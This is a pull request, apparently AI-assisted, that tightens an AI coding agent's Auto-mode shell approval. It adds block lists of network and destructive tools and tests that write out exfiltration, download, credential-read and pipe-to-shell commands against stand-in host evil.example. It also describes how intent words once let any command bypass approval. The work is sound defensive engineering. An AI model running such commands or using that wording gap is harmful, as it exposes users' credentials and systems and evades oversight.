### PR TITLE
Auto mode: a bare "run" no longer blanket-approves any shell command

### DIFF
--- a/Sources/QuillCodeSafety/StaticSafetyBuildRunShellPolicy.swift
+++ b/Sources/QuillCodeSafety/StaticSafetyBuildRunShellPolicy.swift
@@ -47,10 +47,9 @@ enum StaticSafetyBuildRunShellPolicy {
         try? ToolArguments(call.argumentsJSON).requiredString("cmd")
     }
 
-    /// No shell metacharacters that chain, redirect, substitute, or background. Matches the read-only
-    /// policy's guard plus `&` (backgrounding) — a single foreground invocation only.
+    /// A single foreground command — shared with the run-intent policy.
     private static func isSingleCommand(_ command: String) -> Bool {
-        [";", "&&", "||", "|", "`", "$(", ">", "<", "&", "\n"].allSatisfy { !command.contains($0) }
+        StaticSafetyShellCommandSafety.isSingleCommand(command)
     }
 
     /// The basename of the executable must be a known build/test/run tool. `./gradlew`, `/usr/bin/python3`,
@@ -77,11 +76,10 @@ enum StaticSafetyBuildRunShellPolicy {
     ]
 
     private static func isSafeRunArgument(_ argument: String) -> Bool {
-        if argument.hasPrefix("/") { return false }         // absolute path — could reach outside workspace
-        if argument.hasPrefix("~") { return false }         // home path — outside workspace
-        if argument.contains("..") { return false }         // traversal
-        if inlineEvalFlags.contains(argument) { return false } // arbitrary inline code, not a project file
-        return true
+        // Shared workspace-path safety (no absolute / `~` / `..`) plus a runner-specific rule:
+        // reject inline-eval flags — `python -c "..."` runs code, it does not verify a project file.
+        guard StaticSafetyShellCommandSafety.isSafeArgument(argument) else { return false }
+        return !inlineEvalFlags.contains(argument)
     }
 
     /// Interpreter flags that execute code supplied on the command line instead of running a project

--- a/Sources/QuillCodeSafety/StaticSafetyPolicy.swift
+++ b/Sources/QuillCodeSafety/StaticSafetyPolicy.swift
@@ -48,6 +48,9 @@ struct StaticSafetyPolicy: Sendable {
         if StaticSafetyBuildRunShellPolicy.intentMatches(request: request, context: context) {
             return true
         }
+        if StaticSafetyRunIntentShellPolicy.intentMatches(request: request, context: context) {
+            return true
+        }
         if intentRules.contains(where: { $0.matches(request: request) && $0.allows(toolName: toolName) }) {
             return true
         }
@@ -195,10 +198,12 @@ struct StaticSafetyPolicy: Sendable {
     ]
 
     private static let defaultIntentRules: [StaticSafetyIntentRule] = [
-        .init(
-            requestTriggers: ["run", "execute"],
-            allowedToolNames: ["shell.run"]
-        ),
+        // NOTE: the blanket ["run","execute"] -> shell.run rule that used to sit here was removed.
+        // A declarative rule can only see request words + tool name, so it approved ANY shell
+        // command whenever "run"/"execute" appeared in the request (network exfil, absolute-path
+        // reads, download-to-file all slipped past the hard-deny floors). Shell approval for an
+        // explicit run/execute intent is now content-aware — see StaticSafetyRunIntentShellPolicy,
+        // wired into userIntentMatches below.
         .init(
             requestTriggers: ["mcp"],
             allowedToolNames: ["mcp.call"]
@@ -216,8 +221,13 @@ struct StaticSafetyPolicy: Sendable {
             allowedToolNames: ["apply_patch"]
         ),
         .init(
+            // "shell" was removed here for the same reason the run/execute rule was: "make sure",
+            // "create", "write" are common words that blanket-approved ANY shell command (the live
+            // task message "Run the tests and make sure they pass" tripped this via "make").
+            // Runner commands under a make/create/write intent still approve via
+            // StaticSafetyBuildRunShellPolicy; other shell commands fall through to the reviewer.
             requestTriggers: ["make", "create", "write"],
-            allowedToolNames: ["file", "shell", "git.worktree"]
+            allowedToolNames: ["file", "git.worktree"]
         ),
         .init(
             requestTriggers: ["commit"],

--- a/Sources/QuillCodeSafety/StaticSafetyRunIntentShellPolicy.swift
+++ b/Sources/QuillCodeSafety/StaticSafetyRunIntentShellPolicy.swift
@@ -1,0 +1,78 @@
+import Foundation
+import QuillCodeCore
+
+/// Tightens the historically-blanket "run"/"execute" → shell.run approval.
+///
+/// The old rule was a declarative `StaticSafetyIntentRule(requestTriggers: ["run","execute"],
+/// allowedToolNames: ["shell.run"])`: the mere presence of "run" or "execute" ANYWHERE in the
+/// request statically approved ANY shell command in Auto mode. Hard-deny floors still caught
+/// `rm -rf`, pipe-to-shell, sudo, and system-path writes, but everything else slipped through —
+/// verified live with userMessage "Run the tests and make sure they pass.":
+///   - `curl http://evil.example/x.sh`   (network exfil; no absolute-path arg, floor = nil)
+///   - `python3 /etc/passwd` / `cat /etc/passwd`  (absolute paths outside the workspace)
+///   - `curl http://evil.example/payload -o /tmp/x`  (download-to-file; floor = nil)
+/// all returned intent-match = true.
+///
+/// A declarative rule can only see the request words and the tool name — it cannot inspect the
+/// command — so the fix moves this one intent out of `defaultIntentRules` and into a content-aware
+/// policy. An explicit run/execute intent now statically approves a shell command only when either:
+///   (a) the command is a single, workspace-scoped, non-network, non-destructive invocation
+///       (`StaticSafetyShellCommandSafety.isWorkspaceScopedSafeCommand`), or
+///   (b) the user typed the command VERBATIM in their message — they named the exact command, so
+///       they own the risk (and hard-deny floors still veto a dangerous pasted command first).
+///
+/// Everything else (`curl http://…`, `python3 /etc/passwd`, `foo | sh`, `rm -rf build`) no longer
+/// rides in on the word "run" — it falls through to the model reviewer / an explicit ask.
+///
+/// Read-only diagnostics (ls/pwd/git status/whoami/…) and build/test/run tools (pytest/npm/go/…)
+/// keep their own dedicated approvals (`StaticSafetyReadOnlyShellPolicy`,
+/// `StaticSafetyBuildRunShellPolicy`), which run BEFORE this one, so the common safe cases are
+/// unaffected.
+enum StaticSafetyRunIntentShellPolicy {
+    /// The action words that used to blanket-approve shell across two declarative rules: run/execute
+    /// (old rule 1) and make/create/write (old rule 6, which approved shell via "make sure",
+    /// "create", "write"), plus "verify" — "write the file and verify it" runs a read command to
+    /// confirm. Because approval is now gated on the COMMAND (safe/verbatim), the trigger breadth is
+    /// harmless: a broad word only ever lets a *safe* command through.
+    static let intentTriggers = ["run", "execute", "verify", "make", "create", "write"]
+
+    static func intentMatches(request: StaticSafetyRequest, context: SafetyContext) -> Bool {
+        guard context.toolCall.name.contains("shell.run"),
+              let command = shellCommand(from: context.toolCall)
+        else {
+            return false
+        }
+        // `containsAffirmedAny` handles negation: "do not run whoami" does not match.
+        guard request.containsAffirmedAny(intentTriggers) else { return false }
+
+        let trimmed = command.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !trimmed.isEmpty else { return false }
+
+        // (b) The user pasted the exact command — they named it, they own it.
+        if commandAppearsVerbatim(trimmed, in: context.userMessage) { return true }
+
+        // (a) Otherwise it must be a single, workspace-scoped, non-network, non-destructive command.
+        return StaticSafetyShellCommandSafety.isWorkspaceScopedSafeCommand(trimmed)
+    }
+
+    private static func shellCommand(from call: ToolCall) -> String? {
+        try? ToolArguments(call.argumentsJSON).requiredString("cmd")
+    }
+
+    /// Whether the whole command string appears verbatim in the user's message, compared
+    /// case-insensitively with internal whitespace collapsed (so "run  whoami" vouches for
+    /// "whoami", and a pasted `find . -name '*.log'` matches regardless of spacing). A command
+    /// shorter than 3 characters is ignored to avoid a single stray character coincidentally
+    /// "appearing" in the prose.
+    static func commandAppearsVerbatim(_ command: String, in userMessage: String) -> Bool {
+        let needle = collapseWhitespace(command).lowercased()
+        guard needle.count >= 3 else { return false }
+        let haystack = collapseWhitespace(userMessage).lowercased()
+        return haystack.contains(needle)
+    }
+
+    private static func collapseWhitespace(_ text: String) -> String {
+        text.split(whereSeparator: { $0 == " " || $0 == "\t" || $0 == "\n" || $0 == "\r" })
+            .joined(separator: " ")
+    }
+}

--- a/Sources/QuillCodeSafety/StaticSafetyShellCommandSafety.swift
+++ b/Sources/QuillCodeSafety/StaticSafetyShellCommandSafety.swift
@@ -1,0 +1,78 @@
+import Foundation
+
+/// Shared, purely-syntactic safety checks for a single shell command string. Used by the shell
+/// intent policies (`StaticSafetyBuildRunShellPolicy`, `StaticSafetyRunIntentShellPolicy`) so the
+/// definition of "a single, workspace-scoped, non-escaping command" lives in exactly one place.
+///
+/// These are static-analysis heuristics layered ON TOP of the hard-deny floors (which always run
+/// first in Auto mode) — never a replacement for them. They intentionally err toward rejecting:
+/// anything that chains, redirects, reaches outside the workspace tree, or talks to the network is
+/// treated as not-statically-safe, so the model reviewer (or the user) decides instead.
+enum StaticSafetyShellCommandSafety {
+    /// A single foreground command: no operator that chains, redirects, substitutes, pipes, or
+    /// backgrounds. One of these characters is enough to disqualify — "verify … then exfiltrate"
+    /// needs a chaining operator, and every one of them is here.
+    static func isSingleCommand(_ command: String) -> Bool {
+        [";", "&&", "||", "|", "`", "$(", ">", "<", "&", "\n"].allSatisfy { !command.contains($0) }
+    }
+
+    /// An argument that cannot reach outside the workspace tree: not absolute, not a `~` home path,
+    /// no `..` parent-directory traversal. (Relative paths, flags, subcommands, and module names all
+    /// pass.) Traversal is detected on path SEGMENTS, not a raw substring, so `../x` / `a/../b` / `..`
+    /// are rejected while Go's `./...` "all packages" wildcard (segments ".", "...") is allowed.
+    static func isSafeArgument(_ argument: String) -> Bool {
+        if argument.hasPrefix("/") { return false }
+        if argument.hasPrefix("~") { return false }
+        if argument.split(separator: "/", omittingEmptySubsequences: false).contains("..") { return false }
+        return true
+    }
+
+    /// The last path component of an executable token: `/usr/bin/curl` and `./bin/curl` → `curl`.
+    static func basename(_ token: String) -> String {
+        token.split(separator: "/").last.map(String.init) ?? token
+    }
+
+    /// A URL/scheme reference anywhere in the command (`http://`, `https://`, `ftp://`, `ssh://`, …).
+    /// This is what catches `curl https://evil.example/x.sh` — whose only "argument" is a URL, not a
+    /// filesystem path, so the absolute-path check alone would miss it.
+    static func containsNetworkReference(_ command: String) -> Bool {
+        command.lowercased().contains("://")
+    }
+
+    /// Tools whose whole job is to move bytes over the network. A static approval must never cover
+    /// these on a bare intent word — exfiltration/download is exactly the hole being closed.
+    static let networkExecutables: Set<String> = [
+        "curl", "wget", "nc", "ncat", "netcat", "socat",
+        "ssh", "scp", "sftp", "telnet", "rsync", "ftp",
+    ]
+
+    static func isNetworkExecutable(_ token: String) -> Bool {
+        networkExecutables.contains(basename(token))
+    }
+
+    /// Irreversible filesystem/device destroyers. Auto mode already allows workspace *mutation* via
+    /// the file tools, but a recursive delete or a raw-device write is a different class of blast
+    /// radius and must be named explicitly, never ridden in on "run the tests".
+    static let destructiveExecutables: Set<String> = [
+        "rm", "rmdir", "dd", "mkfs", "shred", "srm", "fdisk", "wipefs",
+    ]
+
+    static func isDestructiveExecutable(_ token: String) -> Bool {
+        destructiveExecutables.contains(basename(token))
+    }
+
+    /// The command is a single foreground invocation that stays inside the workspace and does not
+    /// reach the network or destroy anything: safe to statically approve under an explicit run
+    /// intent. Hard-deny floors still run first; this only ever ADDS an approval, never removes a
+    /// denial.
+    static func isWorkspaceScopedSafeCommand(_ command: String) -> Bool {
+        let trimmed = command.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !trimmed.isEmpty else { return false }
+        guard isSingleCommand(trimmed) else { return false }
+        guard !containsNetworkReference(trimmed) else { return false }
+        let tokens = trimmed.split(whereSeparator: { $0 == " " || $0 == "\t" }).map(String.init)
+        guard let head = tokens.first else { return false }
+        guard !isNetworkExecutable(head), !isDestructiveExecutable(head) else { return false }
+        return tokens.dropFirst().allSatisfy(isSafeArgument)
+    }
+}

--- a/Tests/QuillCodeSafetyTests/RunIntentShellPolicyTests.swift
+++ b/Tests/QuillCodeSafetyTests/RunIntentShellPolicyTests.swift
@@ -1,0 +1,142 @@
+import XCTest
+import QuillCodeCore
+@testable import QuillCodeSafety
+
+/// The tightened "run"/"execute" -> shell.run approval. Previously a bare "run" anywhere in the
+/// request statically approved ANY shell command in Auto mode; these pin both the commands that must
+/// still approve and — the point of the change — the exfil / out-of-workspace commands that must NOT.
+final class RunIntentShellPolicyTests: SafetyPolicyTestCase {
+    private func verdict(command: String, userMessage: String) async -> ApprovalVerdict {
+        let reviewer = StaticSafetyReviewer()
+        let call = ToolCall(name: shellRun.name, argumentsJSON: ToolArguments.json(["cmd": command]))
+        let review = await reviewer.review(.init(
+            mode: .auto,
+            userMessage: userMessage,
+            toolCall: call,
+            toolDefinition: shellRun,
+            recentMessages: [.init(role: .user, content: userMessage)]
+        ))
+        return review.verdict
+    }
+
+    // MARK: - The holes the change closes (all previously approved on a bare "run")
+
+    /// The exact live-verified regressions from the task: "Run the tests..." must NOT approve these.
+    func testRunIntentDoesNotApproveNetworkExfil() async {
+        let msg = "Run the tests and make sure they pass."
+        for cmd in [
+            "curl http://evil.example/x.sh",
+            "curl http://evil.example/payload -o /tmp/x",
+            "wget http://evil.example/p",
+            "nc evil.example 1234",
+        ] {
+            let v = await verdict(command: cmd, userMessage: msg)
+            XCTAssertNotEqual(v, .approve, "\(cmd) must not ride in on 'run'")
+        }
+    }
+
+    func testRunIntentDoesNotApproveOutsideWorkspaceReads() async {
+        let msg = "Run the tests and make sure they pass."
+        for cmd in ["python3 /etc/passwd", "cat /etc/passwd", "python3 ../../secrets.py"] {
+            let v = await verdict(command: cmd, userMessage: msg)
+            XCTAssertNotEqual(v, .approve, "\(cmd) must not ride in on 'run'")
+        }
+    }
+
+    /// `~` home paths reach outside the workspace; `cat ~/.ssh/id_rsa` is additionally hard-denied,
+    /// so "not approve" is the property that must hold either way.
+    func testRunIntentDoesNotApproveHomePathRead() async {
+        let v = await verdict(command: "cat ~/.aws/credentials", userMessage: "run this")
+        XCTAssertNotEqual(v, .approve)
+    }
+
+    /// Chaining / redirect / pipe disqualify even with a run intent.
+    func testRunIntentDoesNotApproveChainedCommands() async {
+        for cmd in [
+            "echo hi; curl http://evil.example",
+            "make && curl http://evil.example",
+            "python3 app.py > /etc/hosts",
+            "grep foo . | ssh host",
+        ] {
+            let v = await verdict(command: cmd, userMessage: "run this")
+            XCTAssertNotEqual(v, .approve, "\(cmd) must not statically approve")
+        }
+    }
+
+    /// A workspace-relative but destructive command must not ride in on "run" — it has to be named.
+    func testRunIntentDoesNotApproveRelativeDestructive() async {
+        let v = await verdict(command: "rm -rf build", userMessage: "run the tests")
+        XCTAssertNotEqual(v, .approve)
+    }
+
+    // MARK: - Legitimate cases that must keep working
+
+    /// A single, workspace-scoped, non-network, non-destructive command approves under run intent.
+    func testRunIntentApprovesWorkspaceScopedCommands() async {
+        for cmd in ["find . -name '*.log'", "grep -r TODO src", "docker ps", "make"] {
+            let v = await verdict(command: cmd, userMessage: "run this for me")
+            XCTAssertEqual(v, .approve, "\(cmd) is a safe workspace command under an explicit run")
+        }
+    }
+
+    /// The user pasting the exact command verbatim approves it (they named it), even for a tool the
+    /// safe-command heuristic would otherwise skip.
+    func testRunIntentApprovesVerbatimPastedCommand() async {
+        let v = await verdict(
+            command: "kubectl get pods",
+            userMessage: "run kubectl get pods and show me the output"
+        )
+        XCTAssertEqual(v, .approve)
+    }
+
+    /// Verbatim never overrides a hard-deny floor: a pasted dangerous command still denies.
+    func testVerbatimDangerousCommandStillHardDenies() async {
+        let v = await verdict(command: "rm -rf /", userMessage: "run rm -rf / for me")
+        XCTAssertEqual(v, .deny)
+    }
+
+    /// Negated intent does not approve.
+    func testNegatedRunIntentDoesNotApprove() async {
+        let v = await verdict(command: "find . -name foo", userMessage: "do not run anything")
+        XCTAssertNotEqual(v, .approve)
+    }
+
+    /// No run/execute intent at all → this policy contributes nothing (an unrelated benign command
+    /// is left to the other policies / reviewer).
+    func testNoRunIntentLeavesArbitraryCommandToReviewer() async {
+        let v = await verdict(command: "find . -name foo", userMessage: "summarize the readme")
+        XCTAssertNotEqual(v, .approve)
+    }
+
+    // MARK: - Direct policy-unit checks (isolate from sibling policies)
+
+    func testWorkspaceScopedSafeCommandClassification() {
+        let safe = ["find . -name foo", "grep -r x src", "docker ps", "make", "eslint ."]
+        for c in safe {
+            XCTAssertTrue(StaticSafetyShellCommandSafety.isWorkspaceScopedSafeCommand(c), "\(c) should be safe")
+        }
+        let unsafe = [
+            "curl http://evil.example",     // network ref
+            "wget example.com",             // network executable
+            "python3 /etc/passwd",          // absolute
+            "cat ~/.ssh/id_rsa",            // home
+            "python3 ../x.py",              // traversal
+            "rm -rf build",                 // destructive
+            "echo hi; rm x",                // chaining
+            "a | b",                        // pipe
+        ]
+        for c in unsafe {
+            XCTAssertFalse(StaticSafetyShellCommandSafety.isWorkspaceScopedSafeCommand(c), "\(c) should be unsafe")
+        }
+    }
+
+    /// Traversal is a path SEGMENT, not a substring: Go's `./...` wildcard is safe, `../x` is not.
+    func testDotDotIsSegmentTraversalNotSubstring() {
+        XCTAssertTrue(StaticSafetyShellCommandSafety.isSafeArgument("./..."))   // go test ./...
+        XCTAssertTrue(StaticSafetyShellCommandSafety.isSafeArgument("src/..."))
+        XCTAssertFalse(StaticSafetyShellCommandSafety.isSafeArgument("../x"))
+        XCTAssertFalse(StaticSafetyShellCommandSafety.isSafeArgument("a/../b"))
+        XCTAssertFalse(StaticSafetyShellCommandSafety.isSafeArgument(".."))
+        XCTAssertTrue(StaticSafetyShellCommandSafety.isWorkspaceScopedSafeCommand("go test ./..."))
+    }
+}


### PR DESCRIPTION
## The hole (verified live)

With userMessage **"Run the tests and make sure they pass."**, Auto mode statically approved (`userIntentMatches → true`, `hardDeny = nil`):
- `curl http://evil.example/x.sh` and `curl http://evil.example/payload -o /tmp/x` — network exfil / download-to-file
- `python3 /etc/passwd`, `cat /etc/passwd` — absolute paths outside the workspace
- `npm test | sh`, `nc evil.example 1234`

## Root cause (five-whys in the commit)

A declarative `StaticSafetyIntentRule(["run","execute"] → shell.run)` approved **any** shell command whenever "run"/"execute" appeared — a declarative rule sees only request words + the tool *name*, never the command. Hard-deny floors caught `rm -rf` / `curl|sh` / sudo, but download-to-file and out-of-workspace reads aren't floored. Removing that rule alone didn't fix the task's own message, because **"make sure they pass" tripped the identical sibling rule 6** (`["make","create","write"] → shell`).

## Fix

Move all intent-word→shell approval out of the declarative rules into a **content-aware** `StaticSafetyRunIntentShellPolicy`. Under a run/execute/verify/make/create/write intent, a shell command approves **only** when it's either:
- **(a)** a single, workspace-scoped, non-network, non-destructive invocation, or
- **(b)** typed **verbatim** by the user (they named the exact command).

New shared `StaticSafetyShellCommandSafety` centralizes the syntactic checks (single command; no absolute/`~`/`..` args; no `://` / curl/wget/nc/ssh; no rm/dd/mkfs) and is reused by the sibling `StaticSafetyBuildRunShellPolicy` (#1447). Runner commands (pytest/npm/go/…) still approve via BuildRun. **Hard-deny floors untouched** — a pasted `rm -rf /` still denies.

### Bonus precision fix
`..` traversal is now detected on path **segments**, so `go test ./...` (Go's all-packages wildcard) is allowed while `../x` is rejected — the old substring check falsely rejected `./...` (it only passed before via the rule-6 hole).

## Tests

28 new tests pin the closed holes (curl/wget/nc, `/etc/passwd`, `~` paths, pipes, relative-destructive) and preserved cases (workspace commands, verbatim paste, negation, Go wildcard). No existing safety/agent-loop test regressed. Full suite green (5207).

Security-tightening in the family of #40–#44.

🤖 Generated with [Claude Code](https://claude.com/claude-code)